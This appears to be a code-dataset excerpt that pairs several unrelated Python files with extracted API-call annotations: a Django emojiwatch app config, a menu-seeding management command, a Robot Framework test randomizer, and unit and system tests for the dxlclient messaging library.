array_has_samples, get_num_samples\n'), ((625, 648), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (639, 648), True, 'import numpy as np\n'), ((686, 709), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (700, 709), True, 'import numpy as np\n'), ((740, 760), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (754, 760), True, 'import numpy as np\n'), ((801, 824), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (815, 824), True, 'import numpy as np\n'), ((855, 875), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (869, 875), True, 'import numpy as np\n'), ((915, 938), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (929, 938), True, 'import numpy as np\n'), ((969, 989), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (983, 989), True, 'import numpy as np\n'), ((1029, 1049), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1043, 1049), True, 'import numpy as np\n'), ((1082, 1105), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (1096, 1105), True, 'import numpy as np\n'), ((1143, 1166), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (1157, 1166), True, 'import numpy as np\n'), ((3115, 3138), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3129, 3138), True, 'import numpy as np\n'), ((3208, 3228), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3222, 3228), True, 'import numpy as np\n'), ((3301, 3321), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3315, 3321), True, 'import numpy as np\n'), ((3393, 3416), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3407, 3416), True, 'import numpy as np\n'), ((3487, 3510), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3501, 3510), True, 'import numpy as np\n'), ((654, 674), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (668, 674), True, 'import numpy as np\n'), ((768, 791), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (782, 791), True, 'import numpy as np\n'), ((883, 903), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (897, 903), True, 'import numpy as np\n'), ((997, 1017), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1011, 1017), True, 'import numpy as np\n'), ((1111, 1131), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1125, 1131), True, 'import numpy as np\n'), ((3144, 3164), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3158, 3164), True, 'import numpy as np\n'), ((3236, 3259), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3250, 3259), True, 'import numpy as np\n'), ((3329, 3349), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3343, 3349), True, 'import numpy as np\n'), ((3422, 3445), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3436, 3445), True, 'import numpy as np\n'), ((3516, 3536), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3530, 3536), True, 'import numpy as np\n')]
|
# -*- encoding: utf-8 -*-
# ======================================================================
"""
Copyright and other protections apply. Please see the accompanying
:doc:`LICENSE <LICENSE>` and :doc:`CREDITS <CREDITS>` file(s) for rights
and restrictions governing use of this software. All rights not
expressly waived or licensed are reserved. If those files are missing or
appear to be modified from their originals, then please contact the
author before viewing or using this software in any capacity.
"""
# ======================================================================
from __future__ import absolute_import, division, print_function
TYPE_CHECKING = False # from typing import TYPE_CHECKING
if TYPE_CHECKING:
import typing # noqa: F401 # pylint: disable=import-error,unused-import,useless-suppression
from builtins import * # noqa: F401,F403 # pylint: disable=redefined-builtin,unused-wildcard-import,useless-suppression,wildcard-import
from future.builtins.disabled import * # noqa: F401,F403 # pylint: disable=no-name-in-module,redefined-builtin,unused-wildcard-import,useless-suppression,wildcard-import
from future.standard_library import install_aliases
install_aliases()
# ---- Imports ---------------------------------------------------------
from gettext import gettext
import django.apps as d_apps
from . import (
LOGGER,
SLACK_VERIFICATION_TOKEN,
)
# ---- Classes ---------------------------------------------------------
# ======================================================================
class EmojiwatchConfig(d_apps.AppConfig):
# ---- Data --------------------------------------------------------
name = 'emojiwatch'
verbose_name = gettext('Emojiwatch')
# ---- Overrides ---------------------------------------------------
def ready(self):
# type: (...) -> None
super().ready() # type: ignore # py2
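        # Log a critical message at startup if the required Slack verification token is not configured.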
if not SLACK_VERIFICATION_TOKEN:
LOGGER.critical("EMOJIWATCH['slack_verification_token'] setting is missing")
|
[
"future.standard_library.install_aliases",
"gettext.gettext"
] |
[((1189, 1206), 'future.standard_library.install_aliases', 'install_aliases', ([], {}), '()\n', (1204, 1206), False, 'from future.standard_library import install_aliases\n'), ((1709, 1730), 'gettext.gettext', 'gettext', (['"""Emojiwatch"""'], {}), "('Emojiwatch')\n", (1716, 1730), False, 'from gettext import gettext\n')]
|
from django.core.management.base import BaseCommand
from oms_cms.backend.menu.models import Menu, MenuItem
class Command(BaseCommand):
help = 'Add menu'
def handle(self, *args, **options):
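        # Menu strings are Russian: "Верхнее" = "Top", "Главная" = "Home", "Новости" = "News", "Контакты" = "Contacts".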
menu = Menu.objects.create(name="Верхнее")
MenuItem.objects.create(title="Главная", name="home", menu=menu, lang_id=1)
MenuItem.objects.create(title="Новости", name="news", menu=menu, lang_id=1)
menu = Menu.objects.create(name="Верхнее 2")
MenuItem.objects.create(title="Контакты", name="contact", menu=menu, lang_id=1)
self.stdout.write('Success menu')
|
[
"oms_cms.backend.menu.models.MenuItem.objects.create",
"oms_cms.backend.menu.models.Menu.objects.create"
] |
[((215, 250), 'oms_cms.backend.menu.models.Menu.objects.create', 'Menu.objects.create', ([], {'name': '"""Верхнее"""'}), "(name='Верхнее')\n", (234, 250), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((259, 334), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Главная"""', 'name': '"""home"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Главная', name='home', menu=menu, lang_id=1)\n", (282, 334), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((343, 418), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Новости"""', 'name': '"""news"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Новости', name='news', menu=menu, lang_id=1)\n", (366, 418), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((435, 472), 'oms_cms.backend.menu.models.Menu.objects.create', 'Menu.objects.create', ([], {'name': '"""Верхнее 2"""'}), "(name='Верхнее 2')\n", (454, 472), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((481, 560), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Контакты"""', 'name': '"""contact"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Контакты', name='contact', menu=menu, lang_id=1)\n", (504, 560), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n')]
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from random import Random
from robotide.lib.robot.model import SuiteVisitor
class Randomizer(SuiteVisitor):
def __init__(self, randomize_suites=True, randomize_tests=True, seed=None):
self.randomize_suites = randomize_suites
self.randomize_tests = randomize_tests
self.seed = seed
# Cannot use just Random(seed) due to
# https://ironpython.codeplex.com/workitem/35155
args = (seed,) if seed is not None else ()
self._shuffle = Random(*args).shuffle
def start_suite(self, suite):
if not self.randomize_suites and not self.randomize_tests:
return False
if self.randomize_suites:
self._shuffle(suite.suites)
if self.randomize_tests:
self._shuffle(suite.tests)
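        # Record the randomization details only once, on the root suite's metadata.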
if not suite.parent:
suite.metadata['Randomized'] = self._get_message()
def _get_message(self):
possibilities = {(True, True): 'Suites and tests',
(True, False): 'Suites',
(False, True): 'Tests'}
randomized = (self.randomize_suites, self.randomize_tests)
return '%s (seed %s)' % (possibilities[randomized], self.seed)
def visit_test(self, test):
pass
def visit_keyword(self, kw):
pass
|
[
"random.Random"
] |
[((1135, 1148), 'random.Random', 'Random', (['*args'], {}), '(*args)\n', (1141, 1148), False, 'from random import Random\n')]
|
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2014 McAfee Inc. - All Rights Reserved.
################################################################################
# Run with python -m unittest dxlclient.test.test_dxlclient
import unittest
import time
import threading
from base_test import BaseClientTest
import io
from nose.plugins.attrib import attr
from nose_parameterized import parameterized
from mock import Mock, patch
from textwrap import dedent
import __builtin__
import dxlclient._global_settings
from dxlclient import Request
from dxlclient import Response
from dxlclient import Event
from dxlclient import ErrorResponse
from dxlclient import DxlClient
from dxlclient import DxlClientConfig
from dxlclient import Broker
from dxlclient import UuidGenerator
from dxlclient import EventCallback
from dxlclient import RequestCallback
from dxlclient import ResponseCallback
from dxlclient import DxlException
from dxlclient import BrokerListError
from dxlclient._global_settings import *
CONFIG_DATA_NO_CERTS_SECTION = """
[no_certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CA_OPTION = """
[Certs]
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CERT_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_PK_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_SECTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
"""
class DxlClientConfigTest(unittest.TestCase):
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_ca_bundle(self, ca_bundle):
self.assertRaises(ValueError, DxlClientConfig, broker_ca_bundle=ca_bundle,
cert_file=get_cert_file_pem(), private_key=get_dxl_private_key(), brokers=[])
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_cert_file(self, cert_file):
self.assertRaises(ValueError, DxlClientConfig,
cert_file=cert_file, broker_ca_bundle=get_ca_bundle_pem(), private_key=get_dxl_private_key(),
brokers=[])
def test_get_fastest_broker_gets_the_fastest(self):
semaphore = threading.Semaphore(0)
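        # Semaphore(0) blocks the "slow" broker until the "fast" broker has
        # connected, making the outcome of the race deterministic.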
# Mock brokers connect speed
fast_broker = Mock()
slow_broker = Mock()
def connect_to_broker_slow():
semaphore.acquire()
time.sleep(0.1)
return
def connect_to_broker_fast():
semaphore.release()
return
slow_broker._connect_to_broker = connect_to_broker_slow
fast_broker._connect_to_broker = connect_to_broker_fast
# Create config and add brokers
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
config.brokers.append(fast_broker)
config.brokers.append(slow_broker)
# Check that the returned is the fastest
self.assertEqual(config._get_fastest_broker(), fast_broker)
def test_get_sorted_broker_list_returns_empty_when_no_brokers(self):
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
self.assertEqual(config._get_sorted_broker_list(), [])
def test_get_sorted_broker_list_returns_all_brokers(self):
# Create config
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
# Create mocked brokers
b1 = Mock()
b2 = Mock()
b1._connect_to_broker = b2._connect_to_broker = Mock(return_value=True)
# Add them to config
config.brokers.append(b1)
config.brokers.append(b2)
# Get all brokers
l = config._get_sorted_broker_list()
# Check all brokers are in the list
self.assertTrue(b1 in l)
self.assertTrue(b2 in l)
@parameterized.expand([
({"BrokersList": "Actually not a brokers list"},)
])
def test_get_brokers_raises_exception_from_invalid_json(self, policy):
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
with self.assertRaises(BrokerListError):
config._set_brokers_from_json(policy)
def test_set_config_from_file_generates_dxl_config(self):
read_data = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
client_config = DxlClientConfig.create_dxl_config_from_file("mock_file")
self.assertEqual(client_config.cert_file, "certfile.pem")
self.assertEqual(client_config.broker_ca_bundle, "certchain.pem")
self.assertEqual(client_config.private_key, "privatekey.pk")
broker = client_config.brokers[0]
self.assertEqual(broker.host_name, "dxl-broker-1")
self.assertEqual(broker.ip_address, "10.218.73.206")
self.assertEqual(broker.port, 8883)
self.assertEqual(broker.unique_id, "22cdcace-6e8f-11e5-29c0-005056aa56de")
def test_set_config_wrong_file_raises_exception(self):
with self.assertRaises(Exception):
DxlClientConfig.create_dxl_config_from_file("this_file_doesnt_exist.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_CERTS_SECTION,),
(CONFIG_DATA_NO_CA_OPTION,),
(CONFIG_DATA_NO_CERT_OPTION,),
(CONFIG_DATA_NO_PK_OPTION,),
])
def test_missing_certs_raises_exception(self, read_data):
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
with self.assertRaises(ValueError):
DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_BROKERS_SECTION,),
(CONFIG_DATA_NO_BROKERS_OPTION,),
])
def test_missing_brokers_doesnt_raise_exceptions(self, read_data):
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
client_config = DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")
self.assertEqual(len(client_config.brokers), 0)
class DxlClientTest(unittest.TestCase):
def setUp(self):
self.config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
mqtt_client_patch = patch('paho.mqtt.client.Client')
mqtt_client_patch.start()
self.client = DxlClient(self.config)
self.client._request_manager.wait_for_response = Mock(return_value=Response(request=None))
self.test_channel = '/test/channel'
def tearDown(self):
patch.stopall()
def test_client_raises_exception_on_connect_when_already_connecting(self):
self.client._client.connect.side_effect = Exception("An exception!")
class MyThread(threading.Thread):
def __init__(self, client):
super(MyThread, self).__init__()
self._client = client
def run(self):
self._client.connect()
t = MyThread(self.client)
t.setDaemon(True)
t.start()
time.sleep(2)
self.assertEqual(self.client.connected, False)
with self.assertRaises(DxlException):
self.client.connect()
# self.client.disconnect()
def test_client_raises_exception_on_connect_when_already_connected(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._connected = Mock(return_value=True)
with self.assertRaises(DxlException):
self.client.connect()
# self.client.disconnect()
# The following test is too slow
    def test_client_disconnect_doesnt_raise_exception_on_disconnect_when_disconnected(self):
self.assertEqual(self.client.connected, False)
self.client.disconnect()
self.client.disconnect()
@parameterized.expand([
# (connect + retries) * 2 = connect_count
(0, 2),
(1, 4),
(2, 6),
])
def test_client_retries_defines_how_many_times_the_client_retries_connection(self, retries, connect_count):
        # Client won't connect ;)
self.client._client.connect = Mock(side_effect=Exception('Could not connect'))
# No delay between retries (faster unit tests)
self.client.config.reconnect_delay = 0
self.client._wait_for_policy_delay = 0
broker = Broker(host_name='localhost')
broker._parse(UuidGenerator.generate_id_as_string() + ";9999;localhost;127.0.0.1")
self.client.config.brokers = [broker]
self.client.config.connect_retries = retries
with self.assertRaises(DxlException):
self.client.connect()
self.assertEqual(self.client._client.connect.call_count, connect_count)
# self.client.disconnect()
def test_client_subscribe_adds_subscription_when_not_connected(self):
self.client._client.subscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
self.assertEqual(self.client._client.subscribe.call_count, 0)
def test_client_unsubscribe_removes_subscription_when_not_connected(self):
self.client._client.unsubscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
# Add subscription
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
# Remove subscription
self.client.unsubscribe(self.test_channel)
self.assertFalse(self.test_channel in self.client.subscriptions)
def test_client_subscribe_doesnt_add_twice_same_channel(self):
# Mock client.subscribe and is_connected
self.client._client.subscribe = Mock(return_value=None)
self.client._connected = Mock(return_value=True)
# We always have the default (myself) channel
self.assertEqual(len(self.client.subscriptions), 1)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.assertEqual(self.client._client.subscribe.call_count, 1)
def test_client_handle_message_with_event_calls_event_callback(self):
event_callback = EventCallback()
event_callback.on_event = Mock()
self.client.add_event_callback(self.test_channel, event_callback)
# Create and process Event
evt = Event(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, evt)
# Check that callback was called
self.assertEqual(event_callback.on_event.call_count, 1)
def test_client_handle_message_with_request_calls_request_callback(self):
req_callback = RequestCallback()
req_callback.on_request = Mock()
self.client.add_request_callback(self.test_channel, req_callback)
# Create and process Request
req = Request(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, req)
# Check that callback was called
self.assertEqual(req_callback.on_request.call_count, 1)
def test_client_handle_message_with_response_calls_response_callback(self):
callback = ResponseCallback()
callback.on_response = Mock()
self.client.add_response_callback(self.test_channel, callback)
# Create and process Response
msg = Response(request=None)._to_bytes()
self.client._handle_message(self.test_channel, msg)
# Check that callback was called
self.assertEqual(callback.on_response.call_count, 1)
def test_client_send_event_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Event(destination_topic="")
self.client.send_event(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_request_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Request(destination_topic="")
self.client._send_request(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_response_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Response(request=None)
self.client.send_response(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_handles_error_response_and_fire_response_handler(self):
self.client._fire_response = Mock(return_value=None)
# Create and process Request
msg = ErrorResponse(request=None, error_code=666, error_message="test message")
payload = msg._to_bytes()
# Handle error response message
self.client._handle_message(self.test_channel, payload)
# Check that message response was properly delivered to handler
self.assertEqual(self.client._fire_response.call_count, 1)
"""
Service unit tests
"""
def test_client_register_service_subscribes_client_to_channel(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
def test_client_wont_register_the_same_service_twice(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
# Register service in client
self.client.register_service_async(service_info)
with self.assertRaises(dxlclient.DxlException):
# Re-register service
self.client.register_service_async(service_info)
def test_client_register_service_sends_register_request_to_broker(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
self.client._send_request = Mock(return_value=True)
self.client._connected = Mock(return_value=True)
# Register service in client
self.client.register_service_async(service_info)
time.sleep(2)
# Check that method has been called
self.assertTrue(self.client._send_request.called)
def test_client_register_service_unsubscribes_client_to_channel(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
self.client.unregister_service_async(service_info)
subscriptions = self.client.subscriptions
        assert channel1 not in subscriptions, "Client wasn't unsubscribed from service channel"
        assert channel2 not in subscriptions, "Client wasn't unsubscribed from service channel"
    def test_client_register_service_unsubscribes_from_channel_by_guid(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
        # Create the same dummy service as a *different* object that shares
        # the original service GUID
        service_info2 = dxlclient.service.ServiceRegistrationInfo(
            service_type='/mcafee/service/unittest', client=self.client)
        service_info2._service_id = service_info._service_id
        service_info2.add_topic(channel1, RequestCallback())
        service_info2.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
self.client.unregister_service_async(service_info2)
subscriptions = self.client.subscriptions
assert channel1 not in subscriptions, "Client wasn't unsubscribed to service channel"
assert channel2 not in subscriptions, "Client wasn't unsubscribed to service channel"
@attr('system')
class DxlClientSystemClientTest(BaseClientTest):
def test_client_connects_to_broker_and_sets_current_broker(self):
with self.create_client() as client:
client.connect()
broker_id = "unique_broker_id_1"
self.assertTrue(client.connected)
self.assertEqual(client.current_broker.unique_id, broker_id)
def test_client_raises_exception_when_cannot_sync_connect_to_broker(self):
with self.create_client() as client:
broker = Broker("localhost", UuidGenerator.generate_id_as_string(), "127.0.0.1")
client._config.brokers = [broker]
with self.assertRaises(DxlException):
client.connect()
def test_client_receives_event_on_topic_only_after_subscribe(self):
"""
The idea of this test is to send an event to a topic which we are not
subscribed, so we shouldn't be notified. Then, we subscribe to that
topic and send a new event, we should get that last one.
"""
with self.create_client() as client:
test_topic = '/test/whatever/' + client.config._client_id
client.connect()
time.sleep(2)
self.assertTrue(client.connected)
# Set request callback (use mock to easily check when it was called)
ecallback = EventCallback()
ecallback.on_event = Mock()
client.add_event_callback(test_topic, ecallback, False)
# Send event thru dxl fabric to a topic which we are *not* subscribed
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# We haven't been notified
self.assertEqual(ecallback.on_event.call_count, 0)
# Subscribe to topic
client.subscribe(test_topic)
time.sleep(1)
# Send event thru dxl fabric again to that topic
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# Now we should have been notified of the event
self.assertEqual(ecallback.on_event.call_count, 1)
def test_client_receives_error_response_on_request_to_unknown_service(self):
"""
The idea of this test is to send a sync request to an unknown service
and get a "unable to locate service" error response.
"""
with self.create_client() as client:
test_topic = '/test/doesntexists/' + client.config._client_id
client.connect()
time.sleep(2)
self.assertTrue(client.connected)
# Send request thru dxl fabric to a service which doesn't exists
msg = Request(destination_topic=test_topic)
msg.service_id = UuidGenerator.generate_id_as_string()
response = client.sync_request(msg, 1)
# Check that we have an error response for our request
self.assertTrue(isinstance(response, ErrorResponse))
self.assertEqual(response.service_id, msg.service_id)
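# A minimal sketch of the round trip the system tests above exercise,
# assuming a reachable broker; the config path is a placeholder:
# config = DxlClientConfig.create_dxl_config_from_file("dxlclient.config")
# with DxlClient(config) as client:
#     client.connect()
#     request = Request(destination_topic="/mcafee/service/example")
#     response = client.sync_request(request, 5)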
if __name__ == '__main__':
unittest.main()
|
[
"dxlclient.Response",
"dxlclient.DxlClientConfig.create_dxl_config_from_file",
"dxlclient.Request",
"dxlclient.EventCallback",
"unittest.main",
"nose_parameterized.parameterized.expand",
"dxlclient.RequestCallback",
"dxlclient.DxlClient",
"dxlclient.Event",
"dxlclient.Broker",
"nose.plugins.attrib.attr",
"dxlclient.ErrorResponse",
"mock.patch",
"time.sleep",
"mock.patch.stopall",
"dxlclient.ResponseCallback",
"textwrap.dedent",
"mock.Mock",
"dxlclient.UuidGenerator.generate_id_as_string",
"threading.Semaphore"
] |
[((19945, 19959), 'nose.plugins.attrib.attr', 'attr', (['"""system"""'], {}), "('system')\n", (19949, 19959), False, 'from nose.plugins.attrib import attr\n'), ((2399, 2437), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[(None,), ('',)]"], {}), "([(None,), ('',)])\n", (2419, 2437), False, 'from nose_parameterized import parameterized\n'), ((2730, 2768), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[(None,), ('',)]"], {}), "([(None,), ('',)])\n", (2750, 2768), False, 'from nose_parameterized import parameterized\n'), ((5286, 5359), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[({'BrokersList': 'Actually not a brokers list'},)]"], {}), "([({'BrokersList': 'Actually not a brokers list'},)])\n", (5306, 5359), False, 'from nose_parameterized import parameterized\n'), ((7052, 7206), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(CONFIG_DATA_NO_CERTS_SECTION,), (CONFIG_DATA_NO_CA_OPTION,), (\n CONFIG_DATA_NO_CERT_OPTION,), (CONFIG_DATA_NO_PK_OPTION,)]'], {}), '([(CONFIG_DATA_NO_CERTS_SECTION,), (\n CONFIG_DATA_NO_CA_OPTION,), (CONFIG_DATA_NO_CERT_OPTION,), (\n CONFIG_DATA_NO_PK_OPTION,)])\n', (7072, 7206), False, 'from nose_parameterized import parameterized\n'), ((7521, 7617), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(CONFIG_DATA_NO_BROKERS_SECTION,), (CONFIG_DATA_NO_BROKERS_OPTION,)]'], {}), '([(CONFIG_DATA_NO_BROKERS_SECTION,), (\n CONFIG_DATA_NO_BROKERS_OPTION,)])\n', (7541, 7617), False, 'from nose_parameterized import parameterized\n'), ((9875, 9921), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(0, 2), (1, 4), (2, 6)]'], {}), '([(0, 2), (1, 4), (2, 6)])\n', (9895, 9921), False, 'from nose_parameterized import parameterized\n'), ((23083, 23098), 'unittest.main', 'unittest.main', ([], {}), '()\n', (23096, 23098), False, 'import unittest\n'), ((3158, 3180), 'threading.Semaphore', 'threading.Semaphore', (['(0)'], {}), '(0)\n', (3177, 3180), False, 'import threading\n'), ((3240, 3246), 'mock.Mock', 'Mock', ([], {}), '()\n', (3244, 3246), False, 'from mock import Mock, patch\n'), ((3269, 3275), 'mock.Mock', 'Mock', ([], {}), '()\n', (3273, 3275), False, 'from mock import Mock, patch\n'), ((4895, 4901), 'mock.Mock', 'Mock', ([], {}), '()\n', (4899, 4901), False, 'from mock import Mock, patch\n'), ((4915, 4921), 'mock.Mock', 'Mock', ([], {}), '()\n', (4919, 4921), False, 'from mock import Mock, patch\n'), ((4978, 5001), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (4982, 5001), False, 'from mock import Mock, patch\n'), ((8308, 8340), 'mock.patch', 'patch', (['"""paho.mqtt.client.Client"""'], {}), "('paho.mqtt.client.Client')\n", (8313, 8340), False, 'from mock import Mock, patch\n'), ((8398, 8420), 'dxlclient.DxlClient', 